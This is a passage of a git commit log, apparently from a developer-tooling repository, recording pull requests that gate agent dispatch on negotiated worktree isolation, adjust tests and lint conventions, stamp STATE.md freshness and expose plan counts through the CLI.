* chore: acknowledge ship.md growth

* fix(#2783): repair ship workflow structure

* fix(#2783): gate ship-note recovery on current PR state

* fix(#2783): avoid scanner collision in poll loop

* fix(#2783): address reviewer feedback on ship-note wedge handling

* test: add timeout to spawnSync in ship-notes-wedged-pr.test.cjs to satisfy lint

* test: update ghCalls bound expectation in ship-notes-wedged-pr.test.cjs

* test: restore ghCalls expected count in ship-notes-wedged-pr.test.cjs
2026-08-11 17:10:36 -04:00
Behruz Nassre Esfahani
2076d450d7 fix(#2652): gate quick/diagnose dispatch on dispatch.isolation, not the runtime name (#2728)
* fix(#2652): gate quick/diagnose dispatch on dispatch.isolation, not runtime name

quick.md and diagnose-issues.md kept the pre-#2584 `RUNTIME != "claude"`
worktree gate, so every non-Claude runtime failed closed regardless of the
capability it negotiated — including Codex, which declares
orchestrator-worktree. Route both through the negotiated dispatch.isolation
seam via a new shared reference, and migrate the two execute-phase reference
fragments that carried the same runtime-name gate.

- new gsd-core/references/dispatch-isolation-gate.md: canonical ISOLATION
  resolution, harness-flag resolution, single-agent degrade rule
- quick.md / diagnose-issues.md read the gate; dispatch uses the {harnessFlag}
  placeholder rather than a hardcoded isolation="worktree"
- execute-phase-wave-guard.md / execute-phase-between-wave-reset.md: migrate
  [ "$RUNTIME" = "claude" ] -> [ "$ISOLATION" = "harness-worktree" ]
- every degrade site now clears BOTH USE_WORKTREES and ISOLATION; clearing one
  dispatched an isolated agent with no base guard and no manifest
- parity guard in host-integration.test.cjs scans workflows AND references and
  matches six reintroduction shapes
- migrate four tests that pinned the pre-#2584 runtime-name contract

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* fix(#2652): use the /gsd:<cmd> namespace in the isolation degrade messages

The degrade warnings cited /gsd-execute-phase, the retired hyphen form that
slash-command-namespace.test.cjs rejects in Claude-facing source. Same length,
so the quick.md size budget is unaffected.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* chore(#2652): add changeset for PR #2728

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* fix(#2652): normalize dispatch-site paths to forward slashes for Windows

path.relative() returns backslash-separated paths on Windows, so the
#2652 dispatch-site parity test compared "gsd-core\workflows\quick.md"
against the hardcoded forward-slash literal "gsd-core/workflows/quick.md"
and failed on every windows-latest CI lane. Normalize with
.replace(/\\/g, '/'), matching the existing convention used elsewhere in
this suite (e.g. tests/branch-no-track-guard.test.cjs:37).

* test(#2652): restore the size-growth acknowledgment

The rebase dropped tests/emitted-drift-ack.json. #2757/#2758 fixed the
ATTRIBUTION axis, but the SIZE-GROWTH axis is independent: diagnose-issues.md
(+2086) and quick.md (+230) still need an ack naming them and saying why.

Verified: 65/66 without it (both files named), 66/66 with it.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* fix(#2652): convert execute-plan.md Pattern A onto the dispatch-isolation gate

Pattern A hardcoded `isolation="worktree"` — Claude Code's own literal —
gated only on `workflow.use_worktrees`, with no capability negotiation at
all. It is the same defect #2652 fixes at the other four sites, just a
different shape: the file contains no RUNTIME variable, so the new detector
correctly does not flag it.

Concrete break: a Codex user who follows this PR's own newly-documented
pattern and sets `workflow.use_worktrees: true` to get isolated dispatch via
/gsd:quick then runs a plan through /gsd-execute-plan Pattern A, and hits an
unconverted path — either an Agent() call erroring on an unrecognized
parameter or silent unisolated execution, depending on host tolerance.

Pattern A is a single-agent dispatch site through the host's own subagent
tool, so it takes the same treatment as quick.md and diagnose-issues.md:
resolve ISOLATION/HARNESS_FLAG through the canonical reference, degrade to
sequential on orchestrator-worktree hosts, and substitute the host's declared
{harnessFlag} instead of Claude Code's literal.

while the area was open.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* docs(#2652): add the INVENTORY row for dispatch-isolation-gate.md, refresh CONTEXT

Two bookkeeping gaps flagged in review:

INVENTORY.md had no row for the new gsd-core/references/dispatch-isolation-gate.md.
INVENTORY-MANIFEST.json was regenerated correctly and its --check only diffs a
live directory scan against the committed manifest, so CI passed regardless —
but gen-inventory-manifest.cjs's own stderr guidance says to add the matching
INVENTORY.md row. This is the repo's named "Inventory Drift" pattern. Placed
with the dispatch/isolation cluster (worktree-branch-check, runtime-aware-dispatch)
rather than alphabetically, matching how that table is grouped.

CONTEXT.md's Host-Integration Interface entry still described dispatch.isolation
as "declared and negotiated but not yet consumed by any scheduler — Phase 1 of
#2584". That was already stale before this PR (execute-phase graduated in Phase 3)
and more so now with three single-agent dispatch sites consuming it.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* test(#2652): detect reversed-operand runtime gates; add a permutation property

All five reintroduction regexes assumed $RUNTIME on the LEFT of the
comparison, so `[ "claude" != "$RUNTIME" ]` — the same gate written
backwards — evaded every one of them. Verified against the old patterns
before fixing: all four reversed shapes (single bracket, double bracket,
test builtin, JS template) scored EVADED.

Each comparison shape is now generated in both operand orders from a single
template, so a shape cannot be added in one order and forgotten in the other.
The mutation table gains the four reversed cases.

Also adds the fast-check property review suggested in place of the hand-rolled
cases: it generates the cross product of the axes an author actually varies —
bracket form, operator, operand order, quoting, spacing, runtime id — so a
permutation the hand-written patterns miss surfaces here rather than in
production. The 11 explicit cases stay as named regression anchors.

execute-plan.md joins the scan's required-identities list now that it is a
converted dispatch site.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* test(#2652): acknowledge the execute-plan.md size growth

The Pattern A conversion adds 811 bytes to an emitted workflow. Per #2719 the
size axis needs its own acknowledgment, independent of attribution.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* test(#2652): repin the execute-plan.md PROSE_ALLOWLIST line after the rebase

The #2751 command-position gate pins its prose exemptions by line number.
This branch inserts the dispatch-isolation resolution above the
`validated downstream by gsd-tools uat classify-coverage` sentence, moving
it from execute-plan.md:387 to :397 — which fired the gate twice for one
displacement (an un-allowlisted mention at 397, a stale entry at 387).
The prose itself is unchanged from next; only the pin moves.

Fixes #2652

* fix(#2652): gate the #2649 base-check on ISOLATION in diagnose-issues.md

The rebase onto next merged #2649's pre-dispatch base-check textually, but
its degrade flipped USE_WORKTREES after ISOLATION was already resolved, so
the degrade never reached the dispatch decision. Gate the block on
ISOLATION = "harness-worktree" and degrade ISOLATION itself, the same
pairing quick.md already uses.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* fix(#2652): key quick.md post-dispatch bookkeeping on ISOLATION, not the Claude literal

Review Blocker: the manifest append (l.822), worktree merge-back (l.825), and
its skip clause (l.839) all conditioned on the literal isolation="worktree" —
Claude Code's own rendering of {harnessFlag}. Cursor renders --worktree, so a
newly-unblocked isolated Cursor run created a worktree whose committed work
was never merged back and never cleaned up, silently. All three now key on
ISOLATION = "harness-worktree" at dispatch.

The existing parity detector cannot catch this class (its ISOLATION_TOKEN
treats the literal as a legitimate marker), so this adds a dedicated
literal-condition detector with a discrimination proof against both pre-fix
sentences, a benign-mention control, and a positive pin on all three
re-keyed conditions. Verified fail-first against the pre-fix quick.md.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* fix(#2652): scope the use_worktrees=false install stamp to isolation=none runtimes

`_stampNonClaudeRuntimeDefaults` rewrote every non-Claude runtime's
`workflow.use_worktrees` read to `--default false`. That default resolved
before `gsd_run query dispatch-isolation` was ever consulted, so the five
runtimes that declare worktree support — cursor (harness-worktree) and
codex/opencode/kimi/kimi-code (orchestrator-worktree) — got ISOLATION=none
regardless of what they negotiated. The gate this PR migrates dispatch onto
was therefore still deciding isolation by runtime name, one layer down.

The stamp's #1521 premise was that worktree isolation *was* Claude Code's
isolation="worktree" spawn parameter, which no other host honored. #2584
replaced that premise with the negotiated capability. The stamp is now scoped
to runtimes whose negotiated isolation really is `none`, where the default it
writes is the outcome the resolver reaches anyway.

`_negotiatedDispatchIsolation` mirrors routeDispatchIsolation's resolution
against the same registry — closed vocabulary, a harness-worktree host must
declare its flag, an orchestrator-worktree host must carry a descriptor that
resolves — and fails closed to `none` on anything else, so an undeclared or
unknown runtime keeps today's behavior.

Two #1515 tests pinned the superseded premise for codex and are re-pointed at
the new contract rather than deleted: the safety property they protect is now
held by the isolation gate's fail-closed resolution, not by a name-scoped
install-time default. Verified fail-first — all five assertions red against
the pre-fix source, green after.

* test(#2652): acknowledge the emitted ripple and re-point the end-to-end stamp proof

Scoping the use_worktrees stamp changes emitted output, and two gates caught it.

`gsd-core/workflows/execute-phase.md` now differs at emit time for the five
hosts that declare worktree support (cursor harness-worktree; codex, opencode,
kimi, kimi-code orchestrator-worktree) — the source file is byte-identical, only
the stamp is gone. Acknowledged in this PR's fragment.

`tests/install.test.cjs`'s real-install assertion pinned the superseded premise
end-to-end, asserting codex receives `--default false`. Re-pointed rather than
deleted, matching the two unit tests: it now proves codex keeps the unstamped
`true` read. A second arm installs windsurf — which declares isolation `none` —
and asserts the false stamp is still applied there, so the change cannot
silently degrade into "never stamp" without a test noticing.

The ack entry collides with `2658-trae-instruction-file-path.json`, which is
fully spent (merged via #2925, so all 25 of its entries are present at base and
gate nothing) and is pruned for the same reason and by the same rule as the
spent `2649-*` fragment this PR already removed. #2566 prunes the same file for
the same collision on `new-project.md`; a delete/delete merges cleanly either
way, and the base-side cleanup would make both unnecessary.

* fix(#2652): re-record the sentinel when a dispatch site degrades isolation

Review Blocker B1/B2/B3. Every isolation degrade in a dispatch site is decided
in shell, where routeDispatchIsolation cannot see it. That resolver persists
whatever it resolved to the run-scoped sentinel as an unconditional side effect
(#3045), so a degrade that only reassigns $ISOLATION leaves the sentinel
asserting harness-worktree while the dispatch correctly omits the harness flag.
The shipped PreToolUse guard reads the sentinel at the instant of the Agent()
call and denies that mismatch with exit 2 — the work does not run unisolated,
it does not run at all. Latent on this branch and lands on rebase, since
8f75e275 (#3045) is not yet in the merge-base.

Four sites now push the final shell-computed value through the same single
write path with --force-isolation, matching the idiom #3045 established in
executor-isolation-dispatch.md:

  - quick.md, after the #1941 base-check degrade
  - diagnose-issues.md, after the config-gate degrades and after #2649's
  - execute-plan.md Pattern A, before spawning
  - references/dispatch-isolation-gate.md, both degrade paths, plus a new
    "Re-record after every degrade" section — the canonical file taught the
    defect, so fixing only the call sites would leave the source of truth wrong

Tests assert the RECORDED value, not $ISOLATION. Asserting the local variable
is what let this class through: $ISOLATION was already `none` at every site and
the defect was entirely in what reached the sentinel. Each workflow's own
degrade block is executed under a gsd_run stub that captures the write, with a
fail-first proof that the pre-fix shape records nothing (while $ISOLATION reads
`none` in both), plus a coverage guard so a new degrade site cannot skip it.

Also corrects the drift-ack rationale (review Minor 5): @-references are
eagerly inlined, so extracting the gate does not reduce loaded context. The
reason to extract is single-sourcing across five dispatch sites.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* test(#2652): satisfy the new CRLF-portability and cleanup lint rules in host-integration.test.cjs

next's local/no-crlf-fragile-split and no-raw-rmsync-in-tests rules now
cover the fenced-block regexes, log-line split, and temp-dir removal this
suite added: bash-fence matchers and line counting accept \r\n, and the
raw fs.rmSync becomes helpers.cleanup (Windows-EBUSY retry budget).

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* fix(#2652): restore next's 2658 ack fragment, minus the one colliding key

trek-e (PR #2728, 2026-08-07): the branch deleted
tests/emitted-drift-acks/2658-trae-instruction-file-path.json wholesale
while next had modified it. That was correct against the 08-03 base, where
the fragment was fully spent; it is wrong against next @ 1d208e5a, which
still carries 23 live entries.

next's copy is restored byte-identical except for the single key that
genuinely collides with this PR's own fragment,
gsd-core/workflows/execute-phase.md. Both acks name that path for
different deltas -- 2658's is the trae CLAUDE.md replacement-target
rewrite, ours is the emit-time _stampNonClaudeRuntimeDefaults ripple from
review round 3. Per the ack-lifecycle law (#2789), an entry already at the
base is spent and inert, so this PR's entry is the live one and 2658's is
dropped.

This follows the guidance given on #2566 in the 08-06 round: "Regenerate
rather than delete -- the collision is one entry."

Verified: lint-emitted-drift-ack ok (0 problems, 357 keys, no cross-source
duplicates); emitted-attribution 170/170 with GSD_EMITTED_BASE=upstream/next;
host-integration 222/222; runtime-converters 130/130.

* fix(#2652): bound the degrade-harness spawn and close the round-6 majors

B1 (CI red, ours): tests/host-integration.test.cjs spawned bash with no
timeout, violating local/no-unbounded-spawn. `next` deleted the allowlist
outright (#3148), so the merge-commit run flags it even though this branch
still carries the file's grandfathered entry. Bounded at 15s, with a named
failure on timeout/signal rather than an opaque `exited null`.

M1: add a parity test between `_negotiatedDispatchIsolation` (install time)
and `routeDispatchIsolation` (dispatch time). Both read the same capability
registry and the same `resolveOrchestratorExec`, but duplicate the DECISION
on top of them across two surfaces with no call edge between them, so neither
symbol appears in the other's impact graph and nothing static can catch them
drifting apart. The resolver leg drives the real gsd-tools CLI per registered
runtime, both ways it is really called: with `--cwd-target` (the executor
spawn, which resolves the orchestrator descriptor — the same question install
time asks) and without it (the `Resolve ISOLATION` call every dispatch site
makes first, which does not). The second leg is what catches an orchestrator
host whose descriptor stops resolving: the install would stamp
`use_worktrees=false` while the workflow gate still reported
`orchestrator-worktree`.

M2: add install-level Cursor coverage. A real `--cursor` install, then the
gate blocks that install emitted, run against the gsd-tools that install
emitted, with the runtime declared through `.planning/config.json` — the tier
`resolveRuntime` actually reads — and any ambient GSD_RUNTIME blanked, so the
install has to reach the right resolver on its own. It then performs the
documented `{harnessFlag}` substitution against the `Agent()` call that
install emitted and asserts on the rendered dispatch: exactly one emitted
Agent() call carries the slot, it is the gsd-executor / gsd-debugger dispatch
rather than some other call in the same file, and rendering it yields
`--worktree` with no residual placeholder and no `isolation="worktree"`.
This is artifact-level — it proves the emitted wiring, not a live Cursor
host invocation. Asserting the shell variable alone would have stayed green
if the placeholder were deleted from the emitted dispatch, or drifted onto
the reviewer call beside it.

M3: diagnose-issues.md inlined a reordered copy of the reference this PR
introduces as the single source of truth. It now reads the reference the
same way quick.md and execute-plan.md do; the drift-ack entry is corrected
to describe what the file actually contains, and to name the four files that
reference the gate rather than claiming five.

M4: CONTEXT.md still called `resolveOrchestratorExec` UNCONSUMED in the same
paragraph this PR edits. It has been consumed since #2584 Phase 3 — routed
through `query dispatch-isolation --json` and process-spawned by
executor-isolation-dispatch.md — and #2652 adds a second consumer.

Every new assertion verified fail-first against a real mutation: cursor's
negotiated isolation (breaks the target-bound parity leg), the no-target
orchestrator branch in routeDispatchIsolation (breaks the gate parity leg),
cursor's harnessIsolationFlag (breaks the resolved value), deleting
`{harnessFlag}` from quick.md's emitted Agent() call (breaks the slot), and
moving it onto the code-reviewer dispatch (breaks the wrong-call guard).

Refs #2652

* fix(#2652): serialize unisolated diagnosis, scope the execute-plan gate to dispatching patterns

Round-7 review findings (independent cross-AI pass over the whole PR against
the current base).

BLOCKER — diagnose-issues.md announced sequential mode and then fanned out.
The `orchestrator-worktree` degrade sets ISOLATION=none and prints "debug
agents run sequentially on the main working tree", but the spawn step still
said "All agents spawn in single message (parallel execution)". On Codex,
OpenCode and Kimi that dispatched N unisolated debuggers concurrently against
the primary checkout — the exact outcome the degrade exists to prevent, and
reachable only because this PR removed the FATAL that used to stop those
hosts earlier. Fan-out is now keyed on ISOLATION: parallel only when each
agent has its own worktree, one at a time otherwise.

BLOCKER — execute-plan.md Pattern B could not dispatch at all on Claude or
Cursor. The gate recorded `harness-worktree` to the #3045 sentinel, but only
Pattern A carries `{harnessFlag}`; Pattern B's segment executors carry none,
and `hooks/gsd-agent-isolation-guard.js` blocks precisely that mismatch with
exit 2. Segments are unisolated BY DESIGN — each continues on the working
tree the previous one left behind, so per-agent worktrees would break the
sequence — so Pattern B now records `none` before its first dispatch and
dispatches without the flag.

MAJOR — the same gate ran before routing was chosen, so an isolation-`none`
host with `use_worktrees=true` hit the fail-closed FATAL even when routing
would have selected Pattern C, which is fully inline and dispatches nothing.
Resolution now happens after the pattern is known, and Pattern C skips it.

MAJOR — tests/host-integration.test.cjs fed `fs.readFileSync` output straight
to bash. The `\r?\n` fence regex guards only the delimiter, leaving embedded
CR on every line of the captured body — DEFECT.WINDOWS-CRLF-TEST-PORTABILITY,
which helpers.cjs documents by name. Now reads through `readFileNormalized`.

MAJOR — the "every dispatch-site degrade block re-records" test hand-listed
three files, so its name was a claim its scan could not support. The scan is
now derived from the workflow/reference tree (SCAN_ROOTS/collectMarkdown
hoisted to module scope so there is one definition, not two). Verified
fail-first against execute-plan.md — a file the previous scan never opened.
The two wave fragments are exempt because they delegate the re-record to
per-plan-worktree-gate.md via USE_WORKTREES_FOR_PLAN; that delegation is now
ASSERTED, so deleting the delegate fails this test instead of widening a hole
silently.

MINOR — the changeset claimed the FATAL was gone for "non-Claude runtimes"
full stop. Narrowed: isolation-`none` hosts still fail closed when worktrees
are explicitly enabled, which is the contract rather than the defect.

Two further findings were investigated and rejected, with evidence:
- Raw `spawnSync` vs `tests/helpers/process-seam.cjs`: the seam exposes
  runNode/runGit/runHook and cannot express the `bash -c` harness these tests
  need; `installAndRead` in this same file is byte-identical to the base and
  still uses raw spawnSync with an explicit timeout, which is the form the
  lint sanctions. Migrating only the new call sites would split the file's
  convention for no safety gain.
- `pending-migration-to-typed-ir` on the runtime-converters parity test: the
  annotation and the rendered-text loop both exist at the merge-base under
  #3090. This PR extends an already-tracked test rather than adding a new one
  under a category CONTRIBUTING closes to new tests.

Refs #2652

* test(#2652): re-point the execute-plan prose allowlist at its shifted line

`PROSE_ALLOWLIST` in tests/no-bare-gsd-tools-command-position.test.cjs keys
entries by LINE NUMBER. The previous commit added the post-routing isolation
block to execute-plan.md, which pushed the `validated downstream by
gsd-tools uat classify-coverage` prose mention from line 397 to 414. That
broke the guard in both directions at once: the entry at 397 went stale, and
the real mention at 414 became an unallowlisted offender.

Caught by CI (7 red jobs, all shard 3/3 plus ubuntu-22) rather than locally,
because I verified only the suites I believed the change touched. Any edit to
a workflow .md shifts line numbers, and this repo carries line-keyed
allowlists — so a workflow edit needs the full suite, not a subset.

Refs #2652

* test(#2652): route the new subprocesses through the process seam

Retracting a rejection I made on the record. In the round-6 response I
argued these call sites could keep a hand-rolled `spawnSync` because the
seam exposes only runNode/runGit/runHook and cannot express `bash -c`, and
because `installAndRead` in the same file uses that shape. The first half
was true and irrelevant, the second half is not a licence: CONTRIBUTING is
unambiguous — "Anything that shells out goes through
tests/helpers/process-seam.cjs — never a hand-rolled spawnSync/execFileSync
in your suite", and "Never use try/finally inside test bodies."

`runHook` already documents `interpreter: 'bash'` for running a shell
script, so writing the harness to a file complies without extending the
seam. I had the rule and the seam's own documentation in front of me and
reasoned around both.

Converted:
- host-integration.test.cjs degrade harness: spawnSync('bash', ['-c', …])
  → runHook(scriptFile, [], { interpreter: 'bash' }).
- install.test.cjs cursor gate: `which bash` probe → process.platform;
  the installer spawn → runNode(…, { env: installSpawnEnv({HOME,
  USERPROFILE}) }), which also blanks ambient GSD_HOME/runtime-location
  vars that could otherwise make capability discovery host-dependent;
  the emitted-gate spawn → runHook(gateScript, [], { interpreter: 'bash' }).
- Three try/finally test bodies → t.after().

Class-norm timeouts: tests/helpers/timeouts.cjs arrived with this branch's
latest base merge, so the literals written earlier (15000/120000/60000) now
duplicate PROBE_TIMEOUT_MS and INSTALL_TIMEOUT_MS. Imported instead — that
module exists because INSTALL_TIMEOUT_MS had already drifted 60s→120s once
after a real bench ETIMEDOUT.

Deliberately NOT converted: `installAndRead`'s spawnSync, which is
byte-identical to the merge-base and predates this PR — converting shared
scaffolding is an unrelated change.

Verified equivalent, not assumed: argv/cwd/env/encoding/timeout and every
assertion are preserved; t.after() still cleans up on the assertion-failure
path the try/finally covered; and the cursor test still resolves Cursor
under a hostile ambient GSD_RUNTIME=claude.

Refs #2652

* fix(#2652): replace the falsified use_worktrees doc row; distinguish an unresolvable gate from a declared none

Round-8 review findings.

BLOCKER — docs/CONFIGURATION.md's `Non-Claude note` asserted three things
this PR overturns: that worktree isolation "no other runtime honors"
(Cursor declares harness-worktree with `--worktree`, and this PR's own
install test asserts that flag reaching the emitted Agent() slot), that
non-Claude installs default the key to `false`, and that forcing `true`
always fails closed. Replaced with the capability-based description, and
the `#1515, #1521` citation dropped — those are the two issues whose
premise this PR removes.

The reviewer flagged that the fix is merge-order dependent, because #2531
rewrites the same row and its replacement text is written in anticipation
of this PR landing. Rather than pick an order, BOTH sides are now
order-independent: #2531's "Current default … until #2652" paragraph
becomes a plain troubleshooting note, and this row states the capability
rule without asserting a stamp state. Whichever merges first, the row is
correct; the second merge is a textual conflict at worst.

MINOR — the gate reported a capability verdict the tool never returned.
`ISOLATION=$(… || echo "none")` made a shim-resolution failure, a non-zero
exit and an empty stdout indistinguishable from a declared `none`, so a
transient query failure aborted /gsd:quick on Claude Code with "runtime
'claude' declares no executor-isolation primitive" — false. The gate now
tracks ISOLATION_RESOLVED separately: both paths still fail closed, but only
a real verdict claims the host declares nothing; the unresolved branch says
it could not resolve and points at the shim. Fixed in the canonical
reference so every dispatch site inherits it.

MINOR — quick.md:527 cited #2649 for its own degrade; that is #1941, and
#2649 is the diagnose-issues/execute-plan gate. Corrected, and the
distinction stated so the next reader does not chase it.

MINOR — quick.md:413 (manifest init) and :429 (worktree_branch_check embed)
still branched on USE_WORKTREES while dispatch, manifest-append, merge-back
and the skip clause had all moved to ISOLATION. Safe only by coincidence —
both now key on ISOLATION.

MINOR — the diff removes a second drift-ack entry (the execute-phase.md key
from 2658-trae-instruction-file-path.json), forced by the same duplicate-key
lint rule as the 2649 removal. Disclosed in the PR comment; the earlier
disclosure covered only one of the two.

Verified: lint:ci green; 300/300 across host-integration,
fix-1941-quick-worktree-stale-base, execute-phase-wave and workflow-guard.

Refs #2652

* test(#2652): anchor the emitted-gate finder on the heading, not the assignment

`b89c3fbf` added a finder that located the gate's `Resolve ISOLATION` block by
the literal `ISOLATION=$(gsd_run query dispatch-isolation --raw`. `f3bccf21`
then split that assignment into `_ISOLATION_RAW`/`ISOLATION_RESOLVED` so a shim
failure stops masquerading as a declared `none` — and the finder stopped
matching. The test did not report the drift it exists to catch; it reported
"emitted dispatch-isolation-gate.md has no Resolve ISOLATION bash block" and
went red, and stayed red because the earlier full-suite run was read from a
truncated log.

Anchored on the heading instead. The workflows tell a dispatch site to run the
`Resolve ISOLATION` and `Resolve the harness flag` blocks BY NAME, so the
heading is the contract and the body is free to change under it.

Verified: 413/413 in tests/install.test.cjs. The test still bites — mutating the
gate's `ISOLATION="$_ISOLATION_RAW"` to `ISOLATION=none` turns it red (the
emitted gate then resolves cursor to none and exits 1 instead of printing
harness-worktree), and reverting restores green.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* fix(#2652): wire the canonical resolver at the one dispatch site that still inlined the old shape

Codex review of the whole PR on the new base found one Major, and it was real.

executor-isolation-dispatch.md declares references/dispatch-isolation-gate.md
canonical at line 10, then kept the OLDER resolver inline: `|| echo "none"`, no
ISOLATION_RESOLVED. So the one site that resolves isolation for the wave path
collapsed a shim failure into a declared `none` and aborted with "runtime
'$RUNTIME' declares no executor-isolation primitive" — false for a Claude or
Cursor user whose resolver merely failed to answer. Still fail-closed, so not an
unsafe-dispatch hole, but the correction this PR is about was unwired at the
site that matters most.

Replaced with the gate's exact shape: capture the raw value, track
ISOLATION_RESOLVED, and emit the "could not resolve" FATAL when no verdict was
learned.

Added a regression test in the #2652 dispatch-site parity suite: every file that
ASSIGNS from `gsd_run query dispatch-isolation --raw` must carry
ISOLATION_RESOLVED, must not use the collapsing form, and must have a distinct
unresolved message. Nothing covered this before — install.test.cjs checks the
emitted REFERENCE, not each site's own inline copy, which is exactly how the two
drifted apart.

The test's first draft also flagged quick.md, diagnose-issues.md and
execute-plan.md. That was a false positive worth recording: those three
@-reference the gate and only make `--force-isolation` re-record calls, which
carry no verdict. The predicate now matches an assignment from the resolver, not
any mention of it, so it flags sites that can actually be wrong.

Verified by mutation: restoring the collapsing line reds the new test.

Validated: lint:ci clean; full suite shows the same 7 known failures as the
pre-change baseline — #1160 _resolveManifest and the #3053 quick_id
host-timezone tests (both reproduce on pristine next @ 33fca50d), plus
helpers-cleanup "outside os.tmpdir()", which fails only in a worktree.

* test(#2652): close two vacuous-pass holes in the new inline-resolver guard

Codex cleared the push and flagged the guard test itself. Both holes were real.

SCAN_ROOTS already yields references/dispatch-isolation-gate.md, and the test
appended it a second time, so the candidate list was [executor, gate, gate] and
`length >= 2` was satisfiable by the gate alone. If the executor site had
dropped out of the predicate — the exact regression the test exists to catch —
it would still have passed. Paths are deduped and the assertion now pins the two
expected inliner identities instead of a count.

The collapse detector keyed on `ISOLATION=$(…)`, so `_ISOLATION_RAW=$(… || echo
"none")` restored the identical defect while satisfying every other assertion
(ISOLATION_RESOLVED still appears in the file). Codex mutation-probed exactly
that and it passed. The pattern now matches any assignment target and any
`|| … echo` tail. Verified: that mutation now reds the test.

Test-only change; the workflow bash is byte-identical to the commit the full
suite ran green against. lint:ci clean, host-integration 223/223.

---------

Co-authored-by: Claude Opus 5 (1M context) <noreply@anthropic.com>
Co-authored-by: Tom Boucher <trekkie@nomorestars.com>
2026-08-11 17:10:28 -04:00
Rezolv
e87fb409ee enhance(#2573): stamp STATE.md with its commit and surface a freshness hint (#2622)
* enhance(#2573): stamp STATE.md with its commit and surface a commit-age freshness hint

Adds a `state_head` stamp to STATE.md and derives a tri-state commit-age
freshness proxy (state_commits_behind / state_commit_stale) through
state.cjs's readStateHeadFreshness, surfaced on smart-entry signals and as
health W024. The proxy is advisory: classify() deliberately does NOT consume
it (ADR-1787 locks the classification/routing boundary — a signal, not a route).

Composes with #3099 and #1882 (both merged to next after this branch): the
commit-age proxy reads `state_head` while the LAST_ACTIVITY_UNPARSEABLE
diagnostic reads `last_activity` — two different fields, not "two staleness
signals on one field." A new regression test asserts a STATE.md carrying both
an unparseable last_activity AND a valid state_head resolves each independently
(diagnostic fires once; freshness reads state_head, commits_behind 0).

Rebased onto next (flattened): resolved the add/add conflicts in
src/smart-entry.cts (kept both the #2573 freshness import/derivation and the
#3099 diagnostic import/call) and tests/smart-entry.unit.test.cjs (kept both
describe blocks). Drift-ack for health.md's W024 row is unchanged (12348 B).
Tests: smart-entry 62, state/state-transition/health/verify 639, all pass.

* chore(#2573): allowlist health-validation test in the prompt-injection scan

The scanner's `exec('` code-execution pattern matches the benign
`re.exec('<phase-id>')` RegExp method calls in the phase-ID grammar tests
(pre-existing: 16 such calls on next, this PR adds none). The file entered the
diff-mode scan's changed-file set only because #2573's W024 state_head
assertions touch it. Allowlist it alongside the other test files that carry
pattern-matching content as data (same DEFECT.PROMPT-INJECTION-SCAN-COLLISION
class). Scanner self-test 38/0; diff scan 14 files, 0 findings.
2026-08-11 17:10:23 -04:00
Tom Boucher
8b4545f3c0 feat(#3218): the prompt layer asks the CLI for plan counts (#3327)
* feat(#3218): the prompt layer asks the CLI for plan counts

Seven sites across four workflows counted plans with ls and wc -l instead of
asking the CLI. A shell glob is not scanPhasePlans, so every fix that landed on
the owner missed all seven: they counted superseded plans as live, reported zero
for the nested plans layout, and missed loosely-named files. The 1762 figure of
30 plans and 24 summaries came from here.

phase find is extended rather than a verb added - 3218 is an enhancement whose
own checklist says it adds no new command, and CONTRIBUTING makes a new verb a
feature needing approved-feature. It gains plan_count and summary_count for the
live set and plan_count_all for the physical one, additively; the existing arrays
are untouched.

Both sets are exposed because the sites need different ones. Amendment 1 names
two cases; three of these sites ask a third - did the planner write files to disk
- and take the physical set, because a superseded plan is still a file the
planner wrote.

The progress.md dead route is fixed and was worse than the issue said. It read
.plans and .summaries arrays that roadmap.analyze has never emitted, so the
fallback always fired, both counts were always zero, and Route 0's
resume-incomplete-phase check had never fired at all.

The ratchet baseline is empty. Its own stale-entry check makes that
self-enforcing.

Verified on the remote runner.

* test(#3218): acknowledge the workflow growth and update the stale guard

The emitted-attribution gate named its own remedy, so it was followed rather
than pre-guessed: four workflow files grew between 200 and 770 bytes because each
replaced a shell glob with a find-phase call plus its jq extraction. plan-phase
grew most - two sites, and it takes the physical count for its did-the-planner-
write-files question. progress also carries the Route 0 dead-path fix.

plan-phase-drift-guard asserted the literal old ls shape. Updated rather than
deleted: what it protects is that a filesystem fallback exists and is reachable,
and that is intact. It is not a regression - gsd_run is already load-bearing
throughout plan-phase.md long before step 9, so the 9a and 11a fallback never
existed to survive gsd_run being unavailable; it guards against the planner
subagent's return hanging.

Three ack sources collided with the new fragment, which the gate treats as a hard
error rather than last-wins. Only the three colliding keys were removed, not the
421 spent entries, and two fragments left entryless were deleted per the
convention that an empty fragment signals nothing.

Verified on the remote runner.

* docs(#3218): document the live and physical plan counts

docs/CLI-TOOLS.md gains a find-phase counts section covering plan_count and
summary_count for the live set against plan_count_all for the physical one, plus
the null-not-zero not-found behavior. The live-versus-physical distinction is
spelled out because a caller picking the wrong one gets a plausible number, which
is the trap Amendment 1 records.

Changeset leads with what a user sees: progress and execute-plan stop counting
superseded plans as outstanding, a nested plans layout stops reporting zero, and
Route 0 resume routing starts working after never having worked.

No how-to. Nothing is enabled and nothing is sequenced - the user runs the same
command and the number is simply correct. The one new distinction is field
semantics, which is what a reference entry is for.

* chore(#3218): backfill changeset PR number

pr:0 placeholder replaced with the real number now that #3327 exists.

---------

Co-authored-by: sim <sim@local>
2026-08-10 12:56:38 -04:00
Tom Boucher
e201cde73c refactor(#3186): one shared phase-completion predicate, disk-strict (#3306)
* docs(#3186): record the disk-strict completion decision in ADR-3180 7.4

The maintainer decided #2957 on 2026-08-08: disk state is authoritative and a
ROADMAP checkbox is a human annotation with no machine authority. Section 7.4
still carried the OPEN QUESTION and was marked blocked, so the contract said one
thing and the tracker another.

Recorded per section 7's own rule - a behavior not stated there is not decided,
and amending a rule is an ADR amendment rather than a code change with a comment.
The decision comment names Phase 4's PR as the carrier of this edit and makes it
